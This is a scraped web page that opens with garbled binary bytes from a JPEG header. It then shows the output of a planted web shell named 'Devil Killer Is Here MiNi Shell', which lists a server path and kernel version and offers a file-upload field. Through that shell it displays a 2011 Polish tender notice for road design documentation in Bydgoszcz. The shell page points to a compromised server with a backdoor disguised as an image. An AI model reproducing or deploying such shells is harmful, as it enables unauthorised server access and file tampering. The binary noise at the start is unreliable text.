JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110518/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110518/141597-N-2011.html

<p class="kh_header"><b>Bydgoszcz: Opracowanie dokumentacji projektowej na zadanie: Rozbudowa drogi wojewódzkiej nr 223 Bydgoszcz - Białe Błota 
od km 3+800 do km 5+150</b><br>
<b>Numer ogłoszenia: 141597 - 2011; data zamieszczenia: 18.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd  Dróg Wojewódzkich , ul. Fordońska 6, 85-085 Bydgoszcz, woj. kujawsko-pomorskie, tel. (52) 370-57-17, faks (52) 370-57-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw-bydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej na zadanie: Rozbudowa drogi wojewódzkiej nr 223 Bydgoszcz - Białe Błota 
od km 3+800 do km 5+150.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej na zadanie: Rozbudowa drogi wojewódzkiej nr 223
 Bydgoszcz - Białe Błota od km 3+800 do km 5+150 
Opis przedmiotu zamówienia:
Zamówienie swym zakresem obejmuje sporządzenie przez wykonawcę projektu budowlanego i wykonawczego 
na rozbudowę drogi wojewódzkiej nr 223 Bydgoszcz -  Białe Błota na odcinku od planowanej budowy ronda kierunek: Trzciniec - Miedzyń do ul. Białej (włączenie do istniejącego przekroju) w Białych Błotach wraz ze ścieżką pieszo-rowerową, odwodnieniem, oświetleniem oraz punktem do ważenia i kontroli pojazdów.

Zamówienie powinno zawierać:
- analizę rozwiązań komunikacyjnych dla odcinka (na odcinku zlokalizowane są 4 skrzyżowania w nienormatywnych odległościach) tj. wykonania jednego skrzyżowania zgodnego z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 roku w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne 
i ich usytuowanie (Dz.U. Nr 43 poz.430 z póź.zm), 
- audyt Bezpieczeństwa Ruchu Drogowego dla rozwiązań projektowych,
- analizę podłoża gruntowego - dokumentacja geologiczna oraz rozwiązanie odwodnienia odcinka wraz z uzyskaniem wymaganych dokumentów. W projektowanym rozwiązaniu należy uwzględnić budowę nowej siedziby Urzędu Gminy.
Ponadto Wykonawca sporządzi:
- dokumentację podziałową gruntów, 
- dokumentację  przetargową wraz z kosztorysem inwestorskim 
- projekt stałej i tymczasowej, na czas trwania robót, organizacji ruchu 
- uzyska prawomocną Decyzję o Zgodzie na Realizację Inwestycji Drogowej.

Wymaga się aby wykonawcy dokonali wizji lokalnej na terenie objętym dokumentacją projektową w celu oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania.
Wykonawca musi zapewnić wykonanie usług zgodnie z prawem polskim, w szczególności z przepisami techniczno - budowlanymi, przepisami dotyczących samodzielnych funkcji technicznych w budownictwie oraz przepisami dotyczącymi wyrobów, materiałów stosowanych w budownictwie.

Warunki do projektowania:
- klasa G
- prędkość miarodajna poza terenem zabudowy,  Vm - 70 km h,
- kategoria ruchu KR5
- szerokość jezdni: cztery pasy ruchu po 3,5m z wyspą dzielącą, (według dokumentacji Drogowej Pracowni Projektowej ANMAR na Rozbudowę odcinka drogi wojewódzkiej nr 223 Bydgoszcz droga nr 80 - Białe Błota droga nr 10 od km 3+200 do 3+900)
- nawierzchnia o nośności 100 kN oś,
- budowa miejsca do ważenia i kontroli pojazdów
- korekta niwelety,
- odwodnienie nawierzchni,
- ścieżka pieszo-rowerowa, szer.3,5m,
- oświetlenie, 
- oznakowanie poziome i pionowe,
- audyt BRD,
- prace branżowe związane z realizacja przebudowy drogi (uwzględnić i rozwiązać kolizje branżowe związane 
z realizacja przebudowy drogi),

Wykonawca będzie uczestniczył w procesie uzyskania wszystkich wymaganych opinii i przedmiotowych decyzji poprzez udzielenie wyjaśnień i dokonywanie potrzebnych zmian i uzupełnień w opracowaniach projektowych.

Wykonawca jest odpowiedzialny za zorganizowanie procesu wykonywania opracowań projektowych, w taki sposób aby założone cele projektu zostały osiągnięte zgodnie z umowa.

Podstawowe obowiązki projektanta w zakresie odpowiedzialności zawodowej oraz wymagania dla projektowanych obiektów określa ustawa prawo budowlane oraz ustawa o samorządzie zawodowym. Obiekt budowlany należy projektować zgodnie z przepisami, w tym techniczno budowlanymi (w tym z rozporządzeniami) oraz zasadami wiedzy technicznej. Obiekty budowlane należy projektować tak, aby zapewnić optymalną ekonomiczność budowy 
i eksploatacji. Obiekty budowlane należy projektować z zastosowaniem technologii robót i materiałów - kierując sie zasadą projektowania optymalnych rozwiązań dla osiągnięcia założonych celów. Wykonawca zobowiązany jest znać wszystkie przepisy wydane przez władze centralne i lokalne oraz inne przepisy, regulaminy i wytyczne, które 
są w jakikolwiek sposób związane z wykonywanymi opracowaniami projektowymi i będzie w pełni odpowiedzialny 
za przestrzeganie ich postanowień podczas wykonywania opracowań projektowych. Wykonawca będzie przestrzegać praw patentowych i będzie w pełni odpowiedzialny za wypełnienie wszelkich wymagań prawnych odnośnie znaków firmowych, nazw lub innych chronionych praw w odniesieniu do projektów, sprzętu, materiałów lub urządzeń użytych lub związanych z wykonywaniem opracowań projektowych. Wszelkie straty, koszty postępowania, obciążenia i wydatki wynikłe lub związane z naruszeniem jakichkolwiek praw patentowych przez Wykonawcę pokryje Wykonawca.

Badania podłoża gruntowego. Wykonawca wykona wszystkie potrzebne pomiary, badania i oceny (ekspertyzy) stanu istniejącego pod kątem badań geotechnicznych podłoża. Opracowanie należy wykonać dla stanu istniejącego. Opracowanie musi dostarczyć informacje o ilości, rodzaju i budowie stref jednorodnych. Strefy jednorodne należy opisać i udokumentować ze względu na grubości warstw w danej strefie oraz skład materiałowy jaki przypada na dana wyszczególniona warstwę. Warstwy opisane maja być ze względu na rodzaj materiału, z jakiego sie składają. Opisane próby maja być źródłem informacji na temat stanu w jakim sie znajduje konstrukcja drogi. Badania geotechniczne konstrukcji jezdni i podłoża gruntowego należy wykonać przy pomocy odwiertów na całym odcinku. Opracowanie należy przedstawić  Zamawiającemu w 4 egzemplarzach w wersji papierowej oraz na komputerowym nośniku informacji.

Projekt budowlany (4 egzemplarze dla zamawiającego wraz z wersja elektroniczna na komputerowym nośniku informacji) - w zakresie zgodnym z wymaganiami określonymi Prawem Budowlanym oraz Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji w sprawie szczegółowego zakresu i formy projektu budowlanego i innymi uregulowaniami prawnymi powinny zawierać min:
1. projekt architektoniczno - budowlany dla wszystkich projektowanych branż,
- opis techniczny
- cześć rysunkowa powinna zawierać co najmniej poniższe rysunki:
Dla części drogowej:
- mapę lokalizacyjna orientacyjna w skali 1:5000 przedstawiająca przebieg drogi oraz obiekty mostowe z częścią opisową oraz określenie zmian w dotychczasowej infrastrukturze zagospodarowania terenu.
- aktualną mapę lokalizacyjną szczegółową, w skali 1:500 przedstawiająca proponowany zakres w postaci linii rozgraniczających (teren pod stałe zajecie), obejmujący zarówno działki wydzielone pod inwestycje jak i działki całe i realizacji zmian w dotychczasowej infrastrukturze (czasowe zajecie terenu). Na mapie tej numery działek dzielonych przekreślić linią czerwoną, a działki po podziale wykazać w kolorze czerwonym.
Poza treścią mapy zasadniczej opracowana mapa powinna posiadać:
-aktualny stan drzew i krzewów
- istniejące drogi
- istniejące obiekty mostowe
- średnice przepustów, rzędna wlotu i wylotu z dokładnością 0,01 m.
- opisane granice ewidencyjne gmin, obrębów
- opisane wyloty dróg
- numery nieruchomości
- zjazdy indywidualne i publiczne
Oryginał mapy w wersji cyfrowej z rozszerzeniem *dgn i *dxf i *dwg
- przekroje normalne - charakterystyczne (1:50, 1:100),
- szczegóły konstrukcyjne - w zależności od potrzeb,
- przekroje podłużne (1:100,1:1000),w tym wlotów dróg bocznych,
Dla infrastruktury technicznej związanej i nie związanej z drogą:
- rozwiązania wynikające z uzgodnień i przepisów branżowych.
Dla obiektów mostowych:
- dokumentacja do wniosku o wydanie decyzji wodno prawnej - 3 egzemplarze w wersji papierowej dla Zamawiającego i wersja elektroniczna na komputerowym nośniku informacji, w tym operat wodno prawny - 4 egzemplarze dla Zamawiającego w wersji papierowej i wersja elektroniczna na komputerowym nośniku informacji .
2. projekt zagospodarowania terenu obejmującego wszystkie branże wraz z częścią architektoniczno - budowlaną 
3. opracowanie /wykaz/ dotyczące ilości drzew, krzewów i karpin do usunięcia z podaniem ich gatunków, obwodu, działek na których sie znajdują,
4. dokumentację geologiczno - inżynierską dla całego odcinka, zgodnie z Instrukcja GDDP
- 40.30, wraz z dokumentacją badań geotechnicznych (podłoża i konstrukcji) należy wykonać dla stanu istniejącego.
5. raport oddziaływania przedsięwzięcia na środowisko wraz z określeniem obszaru
oddziaływania inwestycji (o ile będzie wymagany),
6. opinie, uzgodnienia, pozwolenia - dostarczyć w formie oryginałów dla Zamawiającego,
7. mapę ewidencji gruntów z wyrysowaniem zakresu terenowego inwestycji,
8. informację dotyczącą bezpieczeństwa i ochrony zdrowia,
9. inne niezbędne opinie, w tym uzyskanie opinii Wojewódzkiego Inspektoratu Transportu Drogowego w Bydgoszczy dla punktu do kontroli i ważenia pojazdów, i decyzje administracyjne.

Opracowanie materiałów dla potrzeb uzyskania decyzji o zezwoleniu na realizacje inwestycji i uzyskanie tej zgody (termin złożenia wniosku do 15 listopada 2011) zgodnie z Ustawą z dnia 25 lipca 2008r o zmianie ustawy 
o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych.
Materiały do wniosku powinny zawierać miedzy innymi:
1. Dokumenty geodezyjno - prawne:
a) mapy zawierające projekty podziału nieruchomości z opisem zmian i wykazami synchronizacyjnymi, zaopatrzone klauzula PODGIK, wykonane z trybie ustawy z dnia 10 kwietnia 2003r o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych, (w 4 egzemplarzach mapy zbiorcze i mapy jednostkowe odrębne dla każdej nieruchomości obejmujące wszystkie działki tego samego właściciela). Projekty podziałów nieruchomości przed ich wyniesieniem w terenie, stabilizacja trwała i złożeniem do klauzuli - uzgodnić z Zamawiającym (Wydział Geodezji i Nieruchomości),
b) mapy ewidencyjne dla całych działek (nieruchomości) w liniach rozgraniczających drogi, z pełnym wypisem z rejestrów gruntów, opisem stanu prawnego oraz wykazem zmian i wykazem zmian zaopatrzone klauzula PODGIK (2 egzemplarze dla Zamawiającego).
c) zwykły odpis z ksiąg wieczystych potwierdzone przez sądy wieczysto - księgowe oraz inne dokumenty własności postanowienia sadów, decyzje administracyjne itp. dla wszystkich nieruchomości przeznaczonych w części lub w całości pod inwestycje, potwierdzające własność i oznaczenie nieruchomości oraz ustalenie ich aktualnych właścicieli lub następców prawnych wraz z adresami zamieszkania (1 egzemplarz w oryginale + 1 kopia dla Zamawiającego).
2. Wymagane opinie wg ustawy o szczegółowych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych.
3. Decyzje o środowiskowych uwarunkowaniach zgody na realizacje przedsięwzięcia wraz z raportem o oddziaływaniu planowanego przedsięwzięcia drogowego na środowisko (jeśli będzie wymagany).

Projekty wykonawcze, opracowanie dokumentacji przetargowej wraz z kosztorysem
Inwestorskim. Projekty wykonawcze (4 egzemplarzy + wersja elektroniczna na komputerowym nośniku informacji z rozszerzeniem *.dgn, *dxf (część rysunkowa) oraz * PDF) wszystkich branż.
Celem opracowania projektu wykonawczego jest uzyskanie niezbędnych danych dla potrzeb wykonania, odbioru i rozliczenia robót budowlanych.
Podstawa dla opracowania projektu wykonawczego jest projekt budowlany. Projekt wykonawczy powinien zawierać rozszerzenia ww. opracowania o zagadnienia istotne z punktu widzenia:
- możliwości jednoznacznej oceny i wyceny przedmiotu zamówienia przez oferentów ubiegających sie o zamówienie na wykonanie robót budowlanych,
- potrzeb przyszłego procesu wykonawstwa robót budowlanych.
Opracowanie powinno zawierać, w zależności od potrzeb, zagadnienia związane z projektowanymi obiektami przeznaczonymi do czasowego użytkowania w trakcie realizacji robót.
W skład projektu wykonawczego wchodzą następujące składniki obejmujące wszystkie planowane obiekty, instalacje i urządzenia:
- opis techniczny,
- szczegółowe obliczenia (powierzchni: frezowania, wzmocnienia nawierzchni, zjazdów, skrzyżowań, robót ziemnych, poszerzeń, pozostałych elementów itp.), opinie, uzgodnienia w oryginale i pozwolenia wymagane odrębnymi przepisami, zawierające uzupełnienia istotne dla potrzeb wykonawstwa robót,
- SST,
- istotne z punktu widzenia wykonawstwa robót materiały, które były potrzebne do uzyskania opinii, uzgodnień i pozwoleń wymaganych przepisami odrębnymi w tym m.in.:
     - operaty wodnoprawne (w przypadku potrzeby).
- Rysunki wykonawcze:
Dla obiektów drogowych
- plan sytuacyjny w skali 1:500,
- profile podłużne drogi głównej i bocznych oraz punktów charakterystycznych (1:100, 1:1000),rzędne istniejące min. Co 25 m w osi jezdni (w przypadku potrzeby zagęścić),
- przekroje poprzeczne dróg (1:50,1:100) w tym rzędne istniejącego pasa drogowego co 25 m w punktach
charakterystycznych: min 3 pomiary na jezdni, granica pasa drogowego, cokoły ogrodzeń, a na łukach zagęścić
- szczegóły konstrukcyjne - skala wg potrzeb
- schematy wytyczenia osi dróg za pomocą współrzędnych
- plany warstwicowe skrzyżowań (1:250) - w przypadku potrzeby
- rysunki wykonawcze budowy kanalizacji deszczowej i urządzeń związanych z droga.
Na budowę i przebudowę urządzeń infrastruktury technicznej związanej i nie związanej z droga - wg wymagań branżowych,

Opracowanie dokumentacji przetargowej wraz z kosztorysem inwestorskim, zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r (Dz. U. nr 202 poz 2072) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego oraz zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r (Dz. U. nr 130 poz. 1389) w sprawie metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania
planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym:
- Szczegółowe Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych dla wszystkich branż - odpowiednio do przedmiaru robót (4 egzemplarze dla Zamawiającego + wersja elektroniczna na komputerowym nośniku informacji), powinny zawierać szczegółowe wymagania dla wykonawcy robót w zakresie: sprzętu, materiałów, transportu, wykonania robót, kontroli jakości robót, obmiarów robót, odbiorów robót i płatności za roboty.
- przedmiar robót dla wszystkich branż (4 egzemplarze dla Zamawiającego + wersja elektroniczna na komputerowym nośniku informacji w formacie danych kompatybilnych z MS Excel),
- kosztorys ofertowy dla wszystkich branż (4 egzemplarze dla Zamawiającego + wersja elektroniczna na komputerowym nośniku informacji w formacji danych kompatybilnych z MS Excel) - uwzględniający 23% VAT,
Kosztorys ofertowy powinien być sporządzony na podstawie przedmiarów robót, w następującym układzie: Lp, elementu kosztorysowego, podstawa ustalenia nakładu rzeczowego lub cen jednostkowych, nr pozycji przedmiaru lub innego zestawienia, numer elementu rozliczeniowego, nazwa elementu rozliczeniowego, jednostka miary, ilość jednostek (wypełnić danymi zgodnie z przedmiarem robót oraz SST) natomiast pozycja ceny jednostkowej i ceny za element rozliczeniowy - nie wypełniać.
- zbiorcze zestawienie kosztów dla wszystkich branż (4 egzemplarze dla Zamawiającego + wersja elektroniczna na komputerowym nośniku informacji w formacie danych kompatybilnych z MS Excel),
- kosztorys inwestorski jest to opracowanie projektowe wykonywane w celu oceny kosztów budowy i przeprowadzenia postępowania o udzielenie zamówienia publicznego na wykonanie robót budowlano - montażowych (2 egzemplarze dla Zamawiającego + wersja elektroniczna na komputerowym nośniku informacji, w formacie danych kompatybilnych z MS Excel oraz edytowalnym w programie do kosztorysowania ZUZIA lub CETUS ).

Opracowanie wraz zatwierdzeniem projektów stałej i tymczasowej na czas prowadzenia robót organizacji ruchu.
Projekt organizacji ruchu należy sporządzić zgodnie z §5 ust 1 pkt 1-7 Rozporządzenia Ministra Infrastruktury z dnia 23 września 2003 roku w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym Zarządzeniem (Dz. U nr 177, poz. 1729) oraz Rozporządzeniem Ministra Infrastruktury w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. Nr 220, poz. 2181) oraz spełniać poniższe wymagania 
w zależności od zakresu i miejsca realizacji:
Projekty musza uwzględniać aktualny stan prawny na dzień przekazania dokumentacji Zamawiającemu.
Projekty organizacji ruchu powinny zawierać oznakowanie pionowe, poziome, urządzenia bezpieczeństwa ruchu
drogowego, jeżeli zachodzi taka potrzeba, a w szczególności winny uwzględniać:
- granice obszarów zabudowanych,
- wyznaczenie przejść dla pieszych i przejazdów dla rowerzystów,
- ustalenie oznakowania drogowskazowego,
- wyznaczenie miejsca do kontroli pojazdów.
Zatwierdzony projekt tymczasowej na czas prowadzenia robót organizacji ruchu - należy opracować w postaci:
- graficznej w 4 egzemplarzach,
Zatwierdzony projekt stałej organizacji ruchu należy opracować w postaci:
- graficznej w 4 egzemplarzach,
- cyfrowej,
- zbiory z rozszerzeniem *dgn (w wersji V 5-8 z opisem warstw, przekazać na komputerowym nośniku informacji. Pliki rastrowe tworzące podkład do projektu tworzyć musza ciąg drogi umieszczony w układzie geodezyjnym 65. 
W przypadku dołączania plików referencyjnych do projektu, główny plik zawierający projekt powinien mieć w sobie
aktywne ścieżki dostępu do plików referencyjnych.
Opracowanie w formie cyfrowej winno charakteryzować się następującymi parametrami:
- znaki pionowe jako zgrupowany obiekt, który poddaje sie rozgrupowaniu za pomocą narzędzia Drop Element.
- symbol oraz przepisany pod nim kilometr znaku jako edytowalny tekst, wielkością dopasowany do grafiki znaku pionowego, niezmiennie w całym opracowaniu.
- symbol słupka jak i odnośnik prowadzący do grafiki znaku nie stanowią grupy obiektów z w/w grafika znaku,
- zachowanie czytelności grafiki oznakowania jak i tekstów opisujących oznakowanie przy wydrukach 1:1 000,
- należy dostarczyć plik w formacie *dgn, zawierający wszystkie użyte w opracowaniu znaki pionowe i poziome, 
jako pogrupowane obiekty, wielkością odpowiadające użytej w opracowaniu skali,
- w przypadku, gdy opracowanie zostanie wykonane w innym niż posiadające w sobie zapis do formatu *dgn oprogramowaniu, należy dostarczyć także pliki, z których dokonywana była konwersja do formatu *dgn,
Poszczególne elementy projektu organizacji ruchu (znaki pionowe, znaki poziome, urządzenia BRD) powinny być opisane na oddzielnych warstwach. Należy stworzyć minimum następujące warstwy:
- znaki pionowe do likwidacji,
- znaki pionowe projektowane oraz istniejące pozostawiane,
- znaki poziome projektowane,
- urządzenia BRD do likwidacji,
- urządzenia BRD projektowane oraz istniejące pozostawiane,
- krawędzie jezdni istniejące ( wraz z chodnikami),
- krawędzie jezdni projektowane (wraz z chodnikami),
Nazwy warstw musza jasno określać ich zawartość.
Technologia oznakowania poziomego do uzgodnienia z Zamawiającym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje  udzielenie zamówienia uzupełniającego, o którym mowa w art. 67 ust 1 pkt 6 Ustawy Prawo Zamówień Publicznych stanowiącego nie więcej niż 10 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich 3 latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał co najmniej 2 dokumentacje projektowe, których przedmiotem było wykonanie projektu wykonawczego z zakresu budowy lub przebudowy drogi klasy Z i wyższej o wartości nie mniejszej niż 50 000 zł brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia:
projektant branży drogowej - 1 osoba
- uprawnienia budowlane do projektowania dróg i ulic,
- wykształcanie - wyższe, średnie zawodowe budowlane.
- doświadczenie - min. 5 letnie doświadczenie w branży drogowej w ciągu których wykonał co najmniej jedną dokumentację projektową z zakresu budownictwa drogowego, której przedmiotem była budowa lub przebudowa drogi klasy Z i wyższej o wartości dokumentacji projektowej nie mniejszej niż 50 000 zł brutto.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
